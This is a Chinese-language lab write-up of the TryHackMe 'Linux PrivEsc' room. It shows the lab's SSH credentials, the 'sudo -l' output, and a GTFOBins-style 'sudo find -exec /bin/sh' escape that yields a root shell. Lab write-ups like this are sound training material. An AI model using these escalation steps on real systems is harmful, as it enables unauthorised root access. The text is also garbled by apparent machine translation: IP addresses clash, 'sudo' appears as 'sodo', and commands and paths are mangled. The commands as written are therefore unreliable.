这次,我们将尝试使用“ GTFOBINS”升级特权。
目标机使用Tryhackme下面的房间。
“ tryhackme-linux privesc: https://tryhackme.com/room/linuxprivesc ”
本文是第3部分。
如果您想使用TryHackMe查看Linux Privesc的写入,请检查 Linux中具有脆弱的文件权限的特权高程




准备
启动目标机器
首先,启动目标机器。
加入“ tryhackme-linux privesc: https://tryhackme.com/room/linuxprivesc

如果这样显示IP地址,则可以启动可以。

SSH连接
连接到使用SSH开始的目标机。
如所解释的那样,只要您可以使用“用户:password321”连接。
└─$ ssh user@10.6.6.35无法建立主机'10 .10.6.35(10.10.6.35)的真实性'无法建立。 DSA密钥指纹为SHA256:P2NSSFVYJVK1QE0TSNX5G2H8AAWYRN71JDZ3UEODBMA。您确定要继续连接(是/否/[指纹]),该键不知道其他名称吗?是警告:永久添加'10 .10.6.35'(DSA)中已知主机列表。 user@10.10.6.35's密码:Linux Debian 2.6.32-5-AMD64#1 SMP TUE 5月13日16:34:35 UTC 2014 x86_64 Debian GNU/Linux系统包含的程序是免费的软件;在/usr/share/doc/*/版权所有的单个文件中描述了每个程序的确切分发术语。在适用法律允许的范围内,Debian GNU/Linux绝对没有保修。上次登录:星期五5月15日06:41:23 2020从192.168.1.1.125用户@debian:〜$ sudo -l匹配此主机上用户的默认条目:env_ereset,env_keep+= ld_preload,env_kepect+= ld_library_library_path_path_path_path_path_path
您可能需要添加“ -ohostkeyalgorithms =+ssh-rsa”。
使用GTFOBINS提升特权
现在,我想尝试使用GTFOBINS升级特权。
允许“用户”通过sudo运行多少个程序? (“用户”可以通过sudo运行多少个程序?)
首先,我想获得一个可以在SODO运行的程序。
该命令是“ sodo -L”。
用户@debian:〜$ sudo -l匹配此主机上用户的默认条目:env_reset,env_keep+= ld_preload,env_keep+= ld_library_path_path user用户用户可以在此主机上运行以下命令:(root)nopasswd:/usr/sbin/sbin/iftop(root) /usr/bin/nano (root) NOPASSWD: /usr/bin/vim (root) NOPASSWD: /usr/bin/man (root) NOPASSWD: /usr/bin/awk (root) NOPASSWD: /usr/bin/less (root) NOPASSWD: /usr/bin/ftp (root) NOPASSWD: /usr/bin/nmap (root)nopasswd:/usr/sbin/apache2(root)nopasswd:/bin/more
我发现以上11个程序可以在Sodo运行。

列表上的一个程序在GTFOBINS上没有Shell Escape序列。是哪个?
接下来,寻找没有外壳逃脱序列的程序。
(我想这就像搜索具有外壳逃生序列的程序。)
当我寻找每个人时,我发现没有“ apache2”。

答案是“ apache2”。

尝试使用GTFOBINS提升特权
现在,让我们尝试实际升级特权。
如果上面列出的项目除了“ apache2”之外,应该有可能。这次我会尝试查找。
首先,搜索查找并查看Sodo。

似乎这只是运行命令的问题,因此我将尝试运行它以实现它。

用户@debian:〜$ sudo查找。 -Exec /bin /sh \; - QUIT SH-4.1#WHOAMI根
我已经确认我实际上已经被提升为根。
这真的很容易。 。 。可以这么简单吗? 。 。
概括
这次,我们尝试使用“ GTFOBINS”升级特权。
这有点令人失望,因为它很容易升级特权,但似乎可以使用它。
参考和站点
媒介( shamsher khan ): https://infosecwriteups.com/linux-privesc-trivesc-tryhackme-writeup-bf4e32460ee5